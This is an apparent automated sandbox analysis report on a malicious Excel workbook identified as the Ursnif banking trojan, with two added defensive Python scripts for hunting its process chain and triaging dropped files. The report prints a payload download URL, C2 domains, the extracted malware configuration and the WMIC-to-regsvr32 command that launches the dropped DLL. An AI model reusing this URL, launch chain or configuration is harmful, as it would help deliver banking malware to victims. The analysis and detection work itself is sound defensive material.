Windows Analysis Report inquiry[2021.09.23_12-51].xlsb

Overview

General Information

Sample Name: inquiry[2021.09.23_12-51].xlsb
Analysis ID: 507191
MD5: d5dedf5221391bc183c80173ed5f4279
SHA1: bc48802d095a79a9fb8196d35506c4862c937936
SHA256: f2be1c567425b843b8deec064cd9f747d74f4ae5e15d026fcb5b26549ae3fba9
Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Document exploit detected (drops PE files)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Office process drops PE file
Sigma detected: Regsvr32 Anomaly
Writes or reads registry keys via WMI
Sigma detected: Microsoft Office Product Spawning Windows Shell
Creates processes via WMI
Drops PE files to the user root directory
Writes registry values via WMI
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Contains functionality to create processes via WMI
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Sigma detected: Suspicious WMI Execution
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Abnormal high CPU Usage
Drops files with a non-matching file extension (content does not match file extension)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Yara detected Xls With Macro 4.0
Registers a DLL
Drops PE files to the user directory
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Found malware configuration
Source: 00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "fvJh27FBcY4iDmo8nCK4tyEyXBN1k8EH6mQMtoi0dnoRhrc5m5vdusHgV3SXuoUGMa23szx8nbXoW/YvU6GtHhAvUSB3G4U1Ylw/Xh1SVuQ+LO6TJ5FDzvuvlg0YXcMX9mvaGnH4pn1OZPle0xacxTcEDOgypVqvi4iEgedhkhwkB6rnz9dTsvjARpuFSu5o8A6JPynuxJxchr9FkN/Fno9flLeQF+/qdSiPrlYIV9RsCbTSD+mr7xqZf1jQtWFzbzSlTV418QgPx2KC/w2jRtHZz8hTGrwmHwLbEbIJliSiQj5HSTV5xJYqQZZ7Zy9GbDv8RU+OXsPiONzK+XPKFqwVzJ1/d6Y0ElMnzCE6P84=", "c2_domain": ["apt.updateffboruse.com", "app.updatebrouser.com"], "botnet": "1500", "server": "580", "serpent_key": "H5PUPU7SQqXa0MEJ", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
Multi AV Scanner detection for domain / URL
Source: iqwasithealth.com Virustotal: Detection: 6%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cms Metadefender: Detection: 37%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cms ReversingLabs: Detection: 67%
Source: C:\Users\Public\codec.dll Metadefender: Detection: 37%
Source: C:\Users\Public\codec.dll ReversingLabs: Detection: 67%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 6_2_001A3FAB
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown HTTPS traffic detected: 50.87.248.41:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: Binary string: c:\885\Thus\Drop\Occur\159_take\King.pdb source: regsvr32.exe, 00000006.00000002.674612184.000000006E2CE000.00000002.00020000.sdmp, a435gfhs109[1].cms.0.dr
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2C77FF FindFirstFileExA, 6_2_6E2C77FF

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: codec.dll.0.dr
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\Public\codec.dll
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\wbem\WMIC.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Note: the "Document exploit detected" signatures fire on the behaviour of the Office process (downloading and dropping a PE, then launching WMIC), not on a vulnerability in Excel. No software vulnerability is identified anywhere in this report; the dropper is an Excel 4.0 macro sheet (see "Yara detected Xls With Macro 4.0" below).
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: iqwasithealth.com
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 50.87.248.41:443
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 50.87.248.41:443

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: app.updatebrouser.com
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: apt.updateffboruse.com
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
    GET /wp-content/uploads/2019/06/a435gfhs109.cms HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: iqwasithealth.com
    Connection: Keep-Alive
Note: this is the installed Internet Explorer's default user agent, as expected for a download issued through URLDownloadToFileA (urlmon/WinINet, see Software Vulnerabilities); it is not a string chosen by the macro.
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: regsvr32.exe, 00000006.00000002.673589094.0000000000518000.00000004.00000020.sdmp String found in binary or memory: http://apt.updateffboruse.com/_2BYjuB36DkhB1eXLxT/icgzR9URog3BC5Xw8V6nIs/1N91Pgd5TeSwG/3boxgKnH/mcET
Source: regsvr32.exe, 00000006.00000002.674022207.00000000021E0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: WMIC.exe, 00000003.00000002.415850120.0000000001B60000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.673734417.0000000001D90000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.673666693.0000000001CC0000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000006.00000002.674022207.00000000021E0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: sharedStrings.bin String found in binary or memory: https://iqwasithealth.com/wp-content/uploads/2019/06/a435gfhs109.cms
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CE192CE4.png
Source: unknown DNS traffic detected: queries for: iqwasithealth.com
Source: unknown HTTPS traffic detected: 50.87.248.41:443 -> 192.168.2.22:49165 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000006.00000002.674504755.00000000032F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORYSTR
Source: Yara match File source: 6.2.regsvr32.exe.6e2a0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.2a59590.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.regsvr32.exe.1c8cbc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.2a59590.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.674417843.0000000002A59000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 00000006.00000002.674504755.00000000032F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORYSTR
Source: Yara match File source: 6.2.regsvr32.exe.6e2a0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.2a59590.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.regsvr32.exe.1c8cbc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.2a59590.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.674417843.0000000002A59000.00000004.00000040.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 6_2_001A3FAB

System Summary:

Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cms
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\Public\codec.dll
Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Contains functionality to create processes via WMI
Source: WMIC.exe, 00000003.00000002.415756597.00000000002E4000.00000004.00000040.sdmp Binary or memory string: wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll'MAIN=EIVQSAOUS
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2A2274 6_2_6E2A2274
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A7E30 6_2_001A7E30
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A2654 6_2_001A2654
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A4FA7 6_2_001A4FA7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2CC841 6_2_6E2CC841
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2A121F NtMapViewOfSection, 6_2_6E2A121F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2A1A1C SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 6_2_6E2A1A1C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2A2013 GetProcAddress,NtCreateSection,memset, 6_2_6E2A2013
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2A2495 NtQueryVirtualMemory, 6_2_6E2A2495
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A22EC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 6_2_001A22EC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A8055 NtQueryVirtualMemory, 6_2_001A8055
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\regsvr32.exe Process Stats: CPU usage > 98%
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cms D5FE3F6846CA1F5E09E94D66A816C3FC00634013CA7BF9E35361BD185A27C395
Source: Joe Sandbox View Dropped File: C:\Users\Public\codec.dll D5FE3F6846CA1F5E09E94D66A816C3FC00634013CA7BF9E35361BD185A27C395
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write
Source: codec.dll.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: a435gfhs109[1].cms.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll'
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\Users\Public\codec.dll
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\Public\codec.dll
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$inquiry[2021.09.23_12-51].xlsb
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRDBFC.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSB@6/4@4/1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A4D62 SetWaitableTimer,CoCreateInstance,CoSetProxyBlanket, 6_2_001A4D62
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A11B8 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 6_2_001A11B8
Source: inquiry[2021.09.23_12-51].xlsb Joe Sandbox Cloud Basic: Detection: clean Score: 0
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: inquiry[2021.09.23_12-51].xlsb Initial sample: OLE zip file path = xl/media/image1.png
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: c:\885\Thus\Drop\Occur\159_take\King.pdb source: regsvr32.exe, 00000006.00000002.674612184.000000006E2CE000.00000002.00020000.sdmp, a435gfhs109[1].cms.0.dr
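The process tree recorded above (EXCEL.EXE -> WMIC.exe "process call create" -> regsvr32 -s C:\Users\Public\codec.dll -> SysWOW64\regsvr32.exe) is worth turning into a hunt. Note that the System32 regsvr32.exe is listed with an unknown parent: Win32_Process.Create runs the new process as a child of the WMI provider host (WmiPrvSE.exe), not of WMIC.exe or of Excel, so a plain parent-child rule never sees the link. The following Python is an added example, not Joe Sandbox code: it ties the command requested through WMIC to the later regsvr32 launches by command line instead of parent PID, and separately flags regsvr32 loading a DLL from a user-writable directory. The events are constructed Sysmon-style records whose PIDs and field names are assumed.

```python
"""Hunt for the Excel -> WMIC -> regsvr32 launch chain from this report.

Added example, not Joe Sandbox output. The events below are constructed
to mirror the report's process tree; PIDs are invented, and the field
names (pid, ppid, image, cmdline) are an assumed Sysmon-style shape.
"""
import re
from dataclasses import dataclass

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe"}
# Markers for user-writable drop locations, compared against a lower-cased command line.
USER_WRITABLE = ("c:\\users\\public", "\\appdata\\", "\\temp\\")
# Pulls the embedded command out of "wmic process call create '<cmd>'".
WMIC_CREATE = re.compile(r"process\s+call\s+create\s+['\"]?(?P<cmd>[^'\"]+)", re.I)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def normalize(cmd: str) -> str:
    """Drop quotes and collapse whitespace so the WMIC argument, the System32
    regsvr32 launch and the WOW64 re-launch all compare cleanly."""
    return " ".join(cmd.replace('"', "").replace("'", "").split()).lower()


def detect(events):
    by_pid = {e.pid: e for e in events}
    requested = {}   # normalized command requested via WMI -> the WMIC event
    findings = []
    for e in events:
        img = basename(e.image)
        parent = by_pid.get(e.ppid)
        if img == "wmic.exe" and parent and basename(parent.image) in OFFICE_IMAGES:
            m = WMIC_CREATE.search(e.cmdline)
            if m:
                cmd = normalize(m.group("cmd"))
                requested[cmd] = e
                findings.append({"rule": "office_wmi_process_create", "pid": e.pid,
                                 "parent": basename(parent.image), "requested": cmd})
        elif img == "regsvr32.exe":
            cmd = normalize(e.cmdline)
            # Win32_Process.Create spawns the child under WmiPrvSE.exe, so the parent
            # link to WMIC/Excel is gone; correlate on the command line instead. The
            # WOW64 child carries only "-s <dll>", hence the suffix match.
            via = next((w for c, w in requested.items()
                        if c == cmd or c.endswith(" " + cmd)), None)
            user_dir = any(marker in cmd for marker in USER_WRITABLE)
            if via or user_dir:
                findings.append({"rule": "regsvr32_user_writable_dll", "pid": e.pid,
                                 "cmdline": cmd,
                                 "requested_by_wmic_pid": via.pid if via else None})
    return findings


# Constructed sample events mirroring the report (PIDs invented).
SAMPLE_EVENTS = [
    ProcEvent(1000, 400, r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
              r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding'),
    ProcEvent(1100, 1000, r"C:\Windows\System32\wbem\WMIC.exe",
              r"wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll'"),
    # Parent 700 stands in for WmiPrvSE.exe, which the report shows as "unknown".
    ProcEvent(1200, 700, r"C:\Windows\System32\regsvr32.exe",
              r"regsvr32 -s C:\Users\Public\codec.dll"),
    ProcEvent(1300, 1200, r"C:\Windows\SysWOW64\regsvr32.exe",
              r"-s C:\Users\Public\codec.dll"),
    # Hypothetical benign registration of a system DLL: must not fire.
    ProcEvent(1400, 400, r"C:\Windows\System32\regsvr32.exe",
              r"regsvr32 /s C:\Windows\System32\example.dll"),
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Against the constructed events this yields one office_wmi_process_create finding for the WMIC call and two regsvr32_user_writable_dll findings (the System32 launch and its WOW64 child), both pointing back at the WMIC PID; the hypothetical system-DLL registration is not flagged. In a real environment the regsvr32 events' parent would be WmiPrvSE.exe, which the command-line correlation tolerates.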

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2A2210 push ecx; ret 6_2_6E2A2219
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2A2263 push ecx; ret 6_2_6E2A2273
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A7E1F push ecx; ret 6_2_001A7E2F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A7AB0 push ecx; ret 6_2_001A7AB9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2AF61D push ecx; ret 6_2_6E2AF622
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2AFE10 push 8B419BFFh; retf 6_2_6E2AFE34
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2B024A push esp; retf 6_2_6E2B024C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2B4291 push dword ptr [eax+eax-41h]; ret 6_2_6E2B429F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2B2B4A push ss; ret 6_2_6E2B2B56
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2AF748 push dword ptr [ebp+ebp*2-0Ch]; ret 6_2_6E2AF7CF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2B0B47 push ebp; retf 6_2_6E2B0B49
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2B535F push edx; ret 6_2_6E2B536D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2AF817 push dword ptr [ebp+ebp*2-0Ch]; ret 6_2_6E2AF7CF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2B2869 push edi; retf 6_2_6E2B2876
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2B2073 push esi; ret 6_2_6E2B209D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2B209E push esi; ret 6_2_6E2B209D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2C3DE6 push ecx; ret 6_2_6E2C3DF9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2F9120 pushad ; iretd 6_2_6E2F914E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2FAF10 pushad ; ret 6_2_6E2FAF17
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2FA165 push cs; ret 6_2_6E2FA16D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2FAA50 push esp; iretd 6_2_6E2FAA51
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2FA0B9 push edi; iretd 6_2_6E2FA0BD
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2A1552 LoadLibraryA,GetProcAddress, 6_2_6E2A1552
Registers a DLL
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\Users\Public\codec.dll

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cms
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cms
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\Public\codec.dll
Drops PE files to the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\Public\codec.dll
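The two dropped files above share one SHA256 (see "Dropped file seen in connection with other malware" under System Summary), and the cached download carries a .cms extension while its content is a PE, which is what "Drops files with a non-matching file extension" flags. The following Python is an added example, not part of the report: it sniffs the content type from magic bytes, parses the COFF header of anything that is a PE, and groups identical payloads by hash so the cache copy and C:\Users\Public\codec.dll fall together. The file contents are constructed stand-ins (a minimal MZ/PE header and a PNG signature); only the paths come from the report.

```python
"""Triage dropped files: content-vs-extension mismatch and duplicate payloads.

Added example, not part of the Joe Sandbox report. The file contents are
constructed stand-ins (a minimal MZ/PE header, a PNG signature); only the
paths are taken from the report.
"""
import hashlib
from pathlib import PureWindowsPath

PE_EXTS = {".dll", ".exe", ".sys", ".ocx", ".scr", ".cpl"}
EXPECTED = {".png": "png", ".xlsb": "zip", ".xlsx": "zip", ".xlsm": "zip", ".docx": "zip"}
EXPECTED.update({ext: "pe" for ext in PE_EXTS})
MACHINES = {0x014C: "x86", 0x8664: "x64", 0xAA64: "arm64"}
IMAGE_FILE_DLL = 0x2000


def sniff(data: bytes) -> str:
    """Classify by magic bytes; 'pe' requires e_lfanew to point at 'PE\\0\\0'."""
    if data[:8] == b"\x89PNG\r\n\x1a\n":
        return "png"
    if data[:4] == b"PK\x03\x04":
        return "zip"
    if data[:2] == b"MZ" and len(data) >= 0x40:
        e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
        if data[e_lfanew:e_lfanew + 4] == b"PE\0\0":
            return "pe"
    return "unknown"


def pe_info(data: bytes) -> dict:
    """Machine and DLL flag from the COFF header that follows the PE signature."""
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    coff = e_lfanew + 4
    machine = int.from_bytes(data[coff:coff + 2], "little")
    characteristics = int.from_bytes(data[coff + 18:coff + 20], "little")
    return {"machine": MACHINES.get(machine, hex(machine)),
            "dll": bool(characteristics & IMAGE_FILE_DLL)}


def triage(files: dict) -> dict:
    mismatches, by_hash, pes = [], {}, {}
    for path, data in files.items():
        ext = PureWindowsPath(path).suffix.lower()
        kind = sniff(data)
        expected = EXPECTED.get(ext)
        # A PE under any non-executable extension is a mismatch, as is any
        # extension whose expected container differs from the actual content.
        if (kind == "pe" and ext not in PE_EXTS) or (expected and expected != kind):
            mismatches.append(path)
        if kind == "pe":
            pes[path] = pe_info(data)
        by_hash.setdefault(hashlib.sha256(data).hexdigest(), []).append(path)
    duplicates = {h: sorted(p) for h, p in by_hash.items() if len(p) > 1}
    return {"mismatches": mismatches, "duplicates": duplicates, "pe": pes}


def fake_pe(machine: int = 0x014C, characteristics: int = 0x2102) -> bytes:
    """Constructed minimal MZ stub + PE signature + COFF header (no sections)."""
    hdr = bytearray(0x40 + 24)
    hdr[0:2] = b"MZ"
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")
    hdr[0x40:0x44] = b"PE\0\0"
    hdr[0x44:0x46] = machine.to_bytes(2, "little")
    hdr[0x56:0x58] = characteristics.to_bytes(2, "little")   # DLL | 32BIT | EXECUTABLE
    return bytes(hdr)


CACHE = r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files"
# Constructed contents; the paths are the ones the report lists.
SAMPLE_FILES = {
    CACHE + r"\Content.IE5\ZAE7RW1P\a435gfhs109[1].cms": fake_pe(),
    r"C:\Users\Public\codec.dll": fake_pe(),
    CACHE + r"\Content.MSO\CE192CE4.png": b"\x89PNG\r\n\x1a\n" + bytes(16),
}

if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_FILES), indent=2))
```

On the constructed input the .cms file is the only mismatch, the two PE stand-ins form one duplicate group, and codec.dll is reported as a 32-bit DLL, which matches the report loading it into the SysWOW64 regsvr32.exe. On real dropped files the same triage gives you the hash to pivot on before any detonation.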

